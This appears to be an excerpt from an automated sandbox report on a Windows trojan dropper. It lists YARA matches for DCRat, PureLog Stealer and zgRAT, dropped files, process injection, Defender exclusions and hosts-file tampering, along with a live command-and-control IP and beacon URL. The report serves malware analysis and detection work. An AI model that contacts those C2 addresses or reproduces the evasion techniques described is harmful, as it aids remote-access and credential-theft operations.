                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeQueries volume information: C:\PerfDll\hyperProviderSavesinto.exe VolumeInformationJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeQueries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeQueries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D83FCC GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D83FCC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D66768 GetVersionExW,0_2_00007FF7F4D66768
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Modifies the hosts file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B8A0000.00000004.00000020.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected DCRat
                                Source: Yara matchFile source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED
                                Yara detected zgRAT
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Yara detected DCRat
                                Source: Yara matchFile source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED
                                Yara detected zgRAT
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting                                		Valid Accounts241
                                Windows Management Instrumentation                                		11
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		1
                                File and Directory Permissions Modification                                		1
                                Credential API Hooking                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		12
                                Encrypted Channel                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Native API                                		1
                                DLL Side-Loading                                		1
                                Abuse Elevation Control Mechanism                                		11
                                Disable or Modify Tools                                		LSASS Memory3
                                File and Directory Discovery                                		Remote Desktop Protocol1
                                Credential API Hooking                                		1
                                Non-Application Layer Protocol                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		Security Account Manager57
                                System Information Discovery                                		SMB/Windows Admin SharesData from Network Shared Drive12
                                Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		1
                                Access Token Manipulation                                		1
                                Abuse Elevation Control Mechanism                                		NTDS361
                                Security Software Discovery                                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Service Execution                                		Network Logon Script1
                                Windows Service                                		4
                                Obfuscated Files or Information                                		LSA Secrets2
                                Process Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts713
                                Process Injection                                		3
                                Software Packing                                		Cached Domain Credentials161
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		1
                                DLL Side-Loading                                		DCSync1
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                                Rootkit                                		Proc Filesystem11
                                Remote System Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt32
                                Masquerading                                		/etc/passwd and /etc/shadow1
                                System Network Configuration Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron161
                                Virtualization/Sandbox Evasion                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                Access Token Manipulation                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task713
                                Process Injection                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                Hidden Files and Directories                                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1431496 Sample: C792057CB761DA8872421A6C906... Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 108 Snort IDS alert for network traffic 2->108 110 Multi AV Scanner detection for domain / URL 2->110 112 Antivirus detection for URL or domain 2->112 114 16 other signatures 2->114 11 C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe 9 2->11         started        14 KZcLqgnLvRf.exe 2->14         started        18 nhxnqwkhmssh.exe 2->18         started        20 KZcLqgnLvRf.exe 2->20         started        process3 dnsIp4 94 C:\Users\user\AppData\...behaviorgraphargantuanS.exe, PE32+ 11->94 dropped 96 C:\Users\user\AppData\...behaviorgraphargantuaN.exe, PE32 11->96 dropped 22 GargantuaN.exe 3 6 11->22         started        26 GargantuanS.exe 1 2 11->26         started        106 176.123.168.151, 443, 49730, 49738 SPEEDYLINERU Russian Federation 14->106 98 C:\Users\user\Desktop\zQhPhksn.log, PE32 14->98 dropped 100 C:\Users\user\Desktop\phOzxInG.log, PE32 14->100 dropped 102 C:\Users\user\Desktop\XVmuemSr.log, PE32 14->102 dropped 104 2 other malicious files 14->104 dropped 152 Found direct / indirect Syscall (likely to bypass EDR) 14->152 154 Antivirus detection for dropped file 18->154 156 Multi AV Scanner detection for dropped file 18->156 file5 signatures6 process7 file8 78 C:\PerfDll\hyperProviderSavesinto.exe, PE32 22->78 dropped 80 C:\...\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe, data 22->80 dropped 116 Antivirus detection for dropped file 22->116 118 Multi AV Scanner detection for dropped file 22->118 120 Machine Learning detection for dropped file 22->120 28 wscript.exe 1 22->28         started        82 C:\ProgramData\...\nhxnqwkhmssh.exe, PE32+ 26->82 dropped 84 C:\Windows\System32\drivers\etc\hosts, ASCII 26->84 dropped 122 Modifies the context of a thread in another process (thread injection) 26->122 124 Modifies the hosts file 26->124 126 Adds a directory exclusion to Windows Defender 26->126 31 dialer.exe 26->31         started        33 cmd.exe 26->33         started        35 powershell.exe 23 26->35         started        37 9 other processes 26->37 signatures9 process10 signatures11 136 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->136 39 cmd.exe 1 28->39         started        138 Injects code into the Windows Explorer (explorer.exe) 31->138 140 Contains functionality to inject code into remote processes 31->140 142 Writes to foreign memory regions 31->142 150 4 other signatures 31->150 41 winlogon.exe 31->41 injected 144 Uses ping.exe to sleep 33->144 146 Uses ping.exe to check the status of other devices and networks 33->146 43 conhost.exe 33->43         started        45 wusa.exe 33->45         started        148 Loading BitLocker PowerShell Module 35->148 47 conhost.exe 35->47         started        49 conhost.exe 37->49         started        51 conhost.exe 37->51         started        53 conhost.exe 37->53         started        55 6 other processes 37->55 process12 process13 57 hyperProviderSavesinto.exe 3 21 39->57         started        61 conhost.exe 39->61         started        file14 86 C:\Windows\RemotePackages\...\KZcLqgnLvRf.exe, PE32 57->86 dropped 88 C:\Windows\Provisioning\...\KZcLqgnLvRf.exe, PE32 57->88 dropped 90 C:\Users\user\Desktop\vsaRQqFM.log, PE32 57->90 dropped 92 8 other malicious files 57->92 dropped 128 Antivirus detection for dropped file 57->128 130 Multi AV Scanner detection for dropped file 57->130 132 Machine Learning detection for dropped file 57->132 134 2 other signatures 57->134 63 cmd.exe 57->63         started        66 WmiPrvSE.exe 57->66         started        68 schtasks.exe 57->68         started        70 14 other processes 57->70 signatures15 process16 signatures17 158 Uses ping.exe to sleep 63->158 72 conhost.exe 63->72         started        74 chcp.com 63->74         started        76 PING.EXE 63->76         started        process18

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe61%ReversingLabsWin64.Trojan.Uztuby
                                C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe69%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\GargantuaN.exe100%AviraVBS/Runner.VPG
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe100%AviraHEUR/AGEN.1323342
                                C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe100%AviraTR/Kryptik.gqhhv
                                C:\Users\user\Desktop\zQhPhksn.log100%AviraHEUR/AGEN.1300079
                                C:\Recovery\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat100%AviraBAT/Delbat.C
                                C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe100%AviraVBS/Runner.VPG
                                C:\PerfDll\hyperProviderSavesinto.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\Desktop\WiKMUFpI.log100%AviraTR/PSW.Agent.qngqt
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe100%AviraHEUR/AGEN.1323342
                                C:\Recovery\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\AppData\Local\Temp\GargantuanS.exe100%AviraTR/Kryptik.gqhhv
                                C:\Users\user\Desktop\LugVktua.log100%AviraHEUR/AGEN.1300079
                                C:\Users\user\Desktop\KEMGRwnV.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\Temp\GargantuaN.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe100%Joe Sandbox ML
                                C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
                                C:\PerfDll\hyperProviderSavesinto.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe100%Joe Sandbox ML
                                C:\Recovery\WmiPrvSE.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe100%Joe Sandbox ML
                                C:\PerfDll\hyperProviderSavesinto.exe88%ReversingLabsByteCode-MSIL.Trojan.Leonem
                                C:\PerfDll\hyperProviderSavesinto.exe74%VirustotalBrowse
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe88%ReversingLabsByteCode-MSIL.Trojan.Leonem
                                C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe74%VirustotalBrowse
                                C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe81%ReversingLabsWin64.Packed.Generic
                                C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe61%VirustotalBrowse
                                C:\Recovery\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Trojan.Leonem
                                C:\Recovery\RuntimeBroker.exe74%VirustotalBrowse
                                C:\Recovery\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Trojan.Leonem
                                C:\Recovery\WmiPrvSE.exe74%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\GargantuaN.exe53%ReversingLabsWin32.Trojan.Uztuby
                                C:\Users\user\AppData\Local\Temp\GargantuaN.exe53%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\GargantuanS.exe81%ReversingLabsWin64.Packed.Generic
                                C:\Users\user\AppData\Local\Temp\GargantuanS.exe61%VirustotalBrowse
                                C:\Users\user\Desktop\IkSFhrpY.log17%ReversingLabs
                                C:\Users\user\Desktop\IkSFhrpY.log25%VirustotalBrowse
                                C:\Users\user\Desktop\KEMGRwnV.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                                C:\Users\user\Desktop\KEMGRwnV.log69%VirustotalBrowse
                                C:\Users\user\Desktop\LugVktua.log12%ReversingLabs
                                C:\Users\user\Desktop\LugVktua.log20%VirustotalBrowse
                                C:\Users\user\Desktop\WiKMUFpI.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                                C:\Users\user\Desktop\WiKMUFpI.log69%VirustotalBrowse
                                C:\Users\user\Desktop\XVmuemSr.log12%ReversingLabs
                                C:\Users\user\Desktop\XVmuemSr.log4%VirustotalBrowse
                                C:\Users\user\Desktop\kEwbgeKe.log12%ReversingLabs
                                C:\Users\user\Desktop\kEwbgeKe.log4%VirustotalBrowse
                                C:\Users\user\Desktop\msAjSsFc.log17%ReversingLabs
                                C:\Users\user\Desktop\msAjSsFc.log25%VirustotalBrowse
                                C:\Users\user\Desktop\phOzxInG.log6%ReversingLabs
                                C:\Users\user\Desktop\phOzxInG.log11%VirustotalBrowse
                                C:\Users\user\Desktop\vsaRQqFM.log6%ReversingLabs
                                C:\Users\user\Desktop\vsaRQqFM.log11%VirustotalBrowse
                                C:\Users\user\Desktop\zQhPhksn.log12%ReversingLabs
                                C:\Users\user\Desktop\zQhPhksn.log20%VirustotalBrowse
                                C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe88%ReversingLabsByteCode-MSIL.Trojan.Leonem
                                C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe74%VirustotalBrowse
                                C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe88%ReversingLabsByteCode-MSIL.Trojan.Leonem
                                C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe74%VirustotalBrowse

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://176.123.168.151100%Avira URL Cloudmalware
                                http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows100%Avira URL Cloudmalware
                                http://176.123.168.151100%Avira URL Cloudmalware
                                https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window100%Avira URL Cloudmalware
                                http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php100%Avira URL Cloudmalware
                                https://176.123.168.1515%VirustotalBrowse
                                http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php2%VirustotalBrowse
                                http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows2%VirustotalBrowse
                                http://176.123.168.1519%VirustotalBrowse

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.phptrue
                                • 2%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://176.123.168.151KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 9%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/WindowKZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehyperProviderSavesinto.exe, 00000008.00000002.1733479923.0000000003304000.00000004.00000800.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/WindowsKZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://176.123.168.151KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  176.123.168.151
                                  		unknownRussian Federation
                                  		49342SPEEDYLINERUtrue

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1431496
                                  Start date and time:2024-04-25 10:31:07 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 11m 36s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:56
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                  Detection:MAL
                                  Classification:mal100.troj.adwa.evad.winEXE@77/37@0/1
                                  EGA Information:
                                  • Successful, ratio: 85.7%
                                  HCA Information:
                                  • Successful, ratio: 56%
